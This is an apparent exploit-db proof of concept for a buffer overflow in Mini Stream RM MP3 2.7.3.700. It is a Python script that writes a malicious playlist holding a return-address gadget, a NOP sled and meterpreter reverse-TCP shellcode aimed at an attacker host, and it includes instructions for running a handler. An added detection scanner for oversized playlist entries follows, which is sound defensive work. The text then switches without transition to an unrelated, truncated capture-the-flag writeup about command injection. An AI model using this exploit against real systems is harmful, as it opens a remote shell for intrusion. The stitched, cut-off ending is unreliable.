# Exploit Title: Mini Stream RM MP3 2.7.3.700 Buffer Overflow
# Date: 31.05.2017
# Exploit Author: Dibyendu Sikdar (dibsyhex)
# Vendor Homepage: http://www.downloadsource.net/5318/Mini-stream-RM-MP3-Converter-Easy-RM-to-MP3-Converter/
# Software Link: https://www.exploit-db.com/apps/1bbf03ec57b1ad30970362518e073215-Mini-streamRM-MP3Converter.exe
# Version: 2.7.3.700
# Tested on: Windows 7 Home Basic 32 bit
# Save the file as exploit.py
# Run the code as: python exploit.py
# It will create a file named play.m3u that contains the exploit
# Run a meterpreter handler on the attacker system
# Start the application. Select Load. Select the file type Playlist. Open the play.m3u file
# EIP = 0x1001B058 (PUSH ESP ; RETN gadget)
head = "A" * 35055
nop = "\x90" * 60
eip = "\x58\xB0\x01\x10"
# msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.30.130 LPORT=443 -f c -b "\x00\x0a\x0d"
shell = ("\xd9\xc0\xd9\x74\x24\xf4\x5f\xb8\xad\xaf\xba\x08\x31\xc9\xb1"
"\x54\x31\x47\x18\x03\x47\x18\x83\xef\x51\x4d\x4f\xf4\x41\x10"
"\xb0\x05\x91\x75\x38\xe0\xa0\xb5\x5e\x60\x92\x05\x14\x24\x1e"
"\xed\x78\xdd\x95\x83\x54\xd2\x1e\x29\x83\xdd\x9f\x02\xf7\x7c"
"\x23\x59\x24\x5f\x1a\x92\x39\x9e\x5b\xcf\xb0\xf2\x34\x9b\x67"
"\xe3\x31\xd1\xbb\x88\x09\xf7\xbb\x6d\xd9\xf6\xea\x23\x52\xa1"
"\x2c\xc5\xb7\xd9\x64\xdd\xd4\xe4\x3f\x56\x2e\x92\xc1\xbe\x7f"
"\x5b\x6d\xff\xb0\xae\x6f\xc7\x76\x51\x1a\x31\x85\xec\x1d\x86"
"\xf4\x2a\xab\x1d\x5e\xb8\x0b\xfa\x5f\x6d\xcd\x89\x53\xda\x99"
"\xd6\x77\xdd\x4e\x6d\x83\x56\x71\xa2\x02\x2c\x56\x66\x4f\xf6"
"\xf7\x3f\x35\x59\x07\x5f\x96\x06\xad\x2b\x3a\x52\xdc\x71\x52"
"\x97\xed\x89\xa2\xbf\x66\xf9\x90\x60\xdd\x95\x98\xe9\xfb\x62"
"\xdf\xc3\xbc\xfd\x1e\xec\xbc\xd4\xe4\xb8\xec\x4e\xcd\xc0\x66"
"\x8f\xf2\x14\x12\x8a\x64\x57\x4b\x8a\xf6\x3f\x8e\xb3\xf7\x04"
"\x07\x55\xa7\x2a\x48\xca\x07\x9b\x28\xba\xef\xf1\xa6\xe5\x0f"
"\xfa\x6c\x8e\xa5\x15\xd9\xe6\x51\x8f\x40\x7c\xc0\x50\x5f\xf8"
"\xc2\xdb\x6a\xfc\x8c\x2b\x1e\xee\xf8\x4d\xe0\xee\xf8\xe7\xe0"
"\x84\xfc\xa1\xb7\x30\xfe\x94\xf0\x9e\x01\xf3\x82\xd9\xfd\x82"
"\xb2\x92\xcb\x10\xfb\xcc\x33\xf5\xfb\x0c\x65\x9f\xfb\x64\xd1"
"\xfb\xaf\x91\x1e\xd6\xc3\x09\x8a\xd9\xb5\xfe\x1d\xb2\x3b\xd8"
"\x69\x1d\xc3\x0f\xea\x5a\x3b\xcd\xce\xc2\x54\x2d\x4e\xf3\xa4"
"\x47\x4e\xa3\xcc\x9c\x61\x4c\x3d\x5c\xa8\x05\x55\xd7\x3c\xe7"
"\xc4\xe8\x15\xa9\x58\xe8\x99\x72\x8c\x67\x5e\x85\xb1\x89\x63"
"\x53\x88\xff\xa4\x67\xaf\xf0\x9f\xca\x86\x9a\xdf\x59\xd8\x8e")
# Playlist layout: filler up to the saved return address, the PUSH ESP ; RETN
# address, a NOP sled, the shellcode, then trailing padding
f = open("play.m3u","w")
payload = head+eip+nop+shell+"C"*200
f.write(payload)
f.close()
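The playlist this script writes is a single entry tens of thousands of bytes long that ends in raw machine code, which no legitimate .m3u ever looks like. From the defender's side, the root cause is an unbounded copy of a playlist entry into a fixed-size stack buffer, and the file itself is easy to recognise. The following scanner is an added example, not part of the exploit-db submission above; it flags .m3u entries that exceed a length budget or contain non-printable bytes. The MAX_ENTRY_LEN threshold and the sample playlists are constructed assumptions, not values documented by the affected product.

```python
import string

# Assumed policy: a legitimate playlist entry is a file path or URL, so anything
# far longer than that or containing raw binary is treated as suspicious.
# The limit is an assumption for this example, not a documented product limit.
MAX_ENTRY_LEN = 1024
PRINTABLE = set(string.printable.encode())


def scan_m3u(data: bytes, max_len: int = MAX_ENTRY_LEN):
    """Return a list of (line_no, reason) findings for a playlist body."""
    findings = []
    for no, raw in enumerate(data.splitlines(), start=1):
        line = raw.strip()
        # Skip blank lines and extended-M3U directives such as #EXTM3U / #EXTINF
        if not line or line.startswith(b"#"):
            continue
        if len(line) > max_len:
            findings.append((no, f"entry length {len(line)} exceeds {max_len}"))
        bad = sum(1 for b in line if b not in PRINTABLE)
        if bad:
            findings.append((no, f"{bad} non-printable bytes in entry"))
    return findings


def is_suspicious(data: bytes) -> bool:
    """True when the playlist has at least one finding."""
    return bool(scan_m3u(data))


# Constructed samples (not captured from a real system).
BENIGN = (
    b"#EXTM3U\n"
    b"#EXTINF:123,Some Track\n"
    b"C:\\Music\\track01.mp3\n"
    b"http://example.invalid/stream.mp3\n"
)
# Same shape as the payload above: long filler, a NOP sled, trailing padding.
OVERSIZED = b"A" * 35055 + b"\x90" * 60 + b"C" * 200

if __name__ == "__main__":
    for name, body in (("benign", BENIGN), ("oversized", OVERSIZED)):
        for no, reason in scan_m3u(body) or [(0, "clean")]:
            print(f"{name}: line {no}: {reason}")
```

Run against a directory of playlists, the length check alone catches the file produced above; the printable check additionally catches shorter payloads that still carry a sled or shellcode. Comment lines are skipped so that #EXTINF metadata with long titles does not produce false positives.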
SANS HOLIDAY HACK 2018 Writeup, KRINGLECON

The objectives:
Orientation Challenge
Directory Browsing
de Bruijn Sequences
Data Repo Analysis
AD Privilege Discovery
Badge Manipulation
HR Incident Response
Network Traffic Forensics
Ransomware Recovery
Who Is Behind It All?

First I go to Bushy Evergreen and try to solve the terminal challenge. Solving it is fairly easy: Escape_Key followed by ":q" without quotes. After this we move to the kiosk and solve the questions. The questions were based on the themes of previous Holiday Hack Challenges. Once we answer them correctly we get the flag.

For this I visited Minty Candycane and I tried to solve the terminal challenge. The application has a command injection vulnerability, so injecting a system command with the server IP allows execution of the command. So first I perform an `ls` operation to list the directory contents, followed by a cat of t